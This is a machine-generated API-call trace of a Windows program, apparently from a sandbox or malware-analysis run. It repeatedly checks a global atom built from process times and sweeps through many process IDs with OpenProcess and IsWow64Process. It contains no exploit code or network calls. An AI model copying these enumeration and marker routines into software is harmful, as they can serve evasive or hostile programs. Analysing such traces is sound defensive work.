	[0094.183] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.183] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0094.183] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0094.183] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0094.183] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.183] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0094.184] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.184] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0094.184] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0094.184] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0094.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0094.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0094.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0094.184] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.184] CloseHandle (hObject=0x248) returned 1
	[0094.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0094.184] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.184] CloseHandle (hObject=0x248) returned 1
	[0094.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0094.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0094.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0094.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0094.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0094.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0094.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0094.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0094.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0094.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0094.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0094.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0094.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0094.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0094.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0094.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0094.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0094.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0094.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0094.281] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.281] CloseHandle (hObject=0x248) returned 1
	[0094.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0094.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0094.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0094.281] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.281] CloseHandle (hObject=0x248) returned 1
	[0094.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0094.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0094.282] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.282] CloseHandle (hObject=0x248) returned 1
	[0094.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0094.282] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.282] CloseHandle (hObject=0x248) returned 1
	[0094.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0094.282] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.282] CloseHandle (hObject=0x248) returned 1
	[0094.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0094.282] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.282] CloseHandle (hObject=0x248) returned 1
	[0094.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0094.282] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.282] CloseHandle (hObject=0x248) returned 1
	[0094.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0094.283] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.283] CloseHandle (hObject=0x248) returned 1
	[0094.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0094.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0094.283] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.283] CloseHandle (hObject=0x248) returned 1
	[0094.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0094.283] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.283] CloseHandle (hObject=0x248) returned 1
	[0094.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0094.283] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.283] CloseHandle (hObject=0x248) returned 1
	[0094.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0094.283] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.283] CloseHandle (hObject=0x248) returned 1
	[0094.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0094.284] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.284] CloseHandle (hObject=0x248) returned 1
	[0094.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0094.284] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.284] CloseHandle (hObject=0x248) returned 1
	[0094.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0094.284] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.284] CloseHandle (hObject=0x248) returned 1
	[0094.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0094.284] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.284] CloseHandle (hObject=0x248) returned 1
	[0094.284] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0094.284] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.284] CloseHandle (hObject=0x248) returned 1
	[0094.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0094.285] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.285] CloseHandle (hObject=0x248) returned 1
	[0094.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0094.285] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.285] CloseHandle (hObject=0x248) returned 1
	[0094.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0094.285] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.285] CloseHandle (hObject=0x248) returned 1
	[0094.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0094.285] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.285] CloseHandle (hObject=0x248) returned 1
	[0094.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0094.285] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.285] CloseHandle (hObject=0x248) returned 1
	[0094.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0094.285] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.285] CloseHandle (hObject=0x248) returned 1
	[0094.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0094.286] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.286] CloseHandle (hObject=0x248) returned 1
	[0094.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0094.286] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.286] CloseHandle (hObject=0x248) returned 1
	[0094.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0094.286] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.286] CloseHandle (hObject=0x248) returned 1
	[0094.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0094.286] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.286] CloseHandle (hObject=0x248) returned 1
	[0094.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0094.286] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.286] CloseHandle (hObject=0x248) returned 1
	[0094.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0094.287] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.287] CloseHandle (hObject=0x248) returned 1
	[0094.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0094.287] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.287] CloseHandle (hObject=0x248) returned 1
	[0094.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.287] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.287] CloseHandle (hObject=0x248) returned 1
	[0094.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.287] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.287] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0094.287] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0094.288] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0094.288] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.288] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0094.288] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.288] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0094.288] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0094.288] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0094.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0094.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0094.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0094.289] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.289] CloseHandle (hObject=0x248) returned 1
	[0094.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0094.289] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.289] CloseHandle (hObject=0x248) returned 1
	[0094.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0094.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0094.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0094.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0094.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0094.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0094.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0094.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0094.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0094.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0094.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0094.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0094.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0094.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0094.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0094.436] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0094.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0094.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0094.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0094.437] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.437] CloseHandle (hObject=0x248) returned 1
	[0094.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0094.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0094.437] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0094.437] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.437] CloseHandle (hObject=0x248) returned 1
	[0094.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0094.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0094.438] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.438] CloseHandle (hObject=0x248) returned 1
	[0094.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0094.438] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.438] CloseHandle (hObject=0x248) returned 1
	[0094.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0094.438] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.438] CloseHandle (hObject=0x248) returned 1
	[0094.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0094.438] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.438] CloseHandle (hObject=0x248) returned 1
	[0094.438] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0094.438] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.438] CloseHandle (hObject=0x248) returned 1
	[0094.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0094.439] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.439] CloseHandle (hObject=0x248) returned 1
	[0094.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0094.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0094.439] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.439] CloseHandle (hObject=0x248) returned 1
	[0094.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0094.439] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.439] CloseHandle (hObject=0x248) returned 1
	[0094.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0094.439] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.439] CloseHandle (hObject=0x248) returned 1
	[0094.439] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0094.440] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.440] CloseHandle (hObject=0x248) returned 1
	[0094.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0094.440] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.440] CloseHandle (hObject=0x248) returned 1
	[0094.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0094.440] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.440] CloseHandle (hObject=0x248) returned 1
	[0094.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0094.440] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.440] CloseHandle (hObject=0x248) returned 1
	[0094.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0094.440] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.440] CloseHandle (hObject=0x248) returned 1
	[0094.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0094.440] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.441] CloseHandle (hObject=0x248) returned 1
	[0094.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0094.441] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.441] CloseHandle (hObject=0x248) returned 1
	[0094.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0094.441] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.441] CloseHandle (hObject=0x248) returned 1
	[0094.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0094.441] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.441] CloseHandle (hObject=0x248) returned 1
	[0094.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0094.441] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.441] CloseHandle (hObject=0x248) returned 1
	[0094.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0094.441] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.441] CloseHandle (hObject=0x248) returned 1
	[0094.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0094.442] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.442] CloseHandle (hObject=0x248) returned 1
	[0094.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0094.442] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.442] CloseHandle (hObject=0x248) returned 1
	[0094.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0094.442] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.442] CloseHandle (hObject=0x248) returned 1
	[0094.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0094.442] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.442] CloseHandle (hObject=0x248) returned 1
	[0094.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0094.442] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.442] CloseHandle (hObject=0x248) returned 1
	[0094.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0094.443] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.443] CloseHandle (hObject=0x248) returned 1
	[0094.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0094.443] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.443] CloseHandle (hObject=0x248) returned 1
	[0094.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0094.443] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.443] CloseHandle (hObject=0x248) returned 1
	[0094.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.443] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.443] CloseHandle (hObject=0x248) returned 1
	[0094.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0094.444] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.444] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0094.444] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0094.444] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0094.444] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.444] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0094.445] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0094.445] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0094.445] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0094.445] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0094.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0094.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0094.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0094.445] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.445] CloseHandle (hObject=0x248) returned 1
	[0094.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0094.445] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0094.445] CloseHandle (hObject=0x248) returned 1
	[0094.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0094.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0094.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0094.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0094.548] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
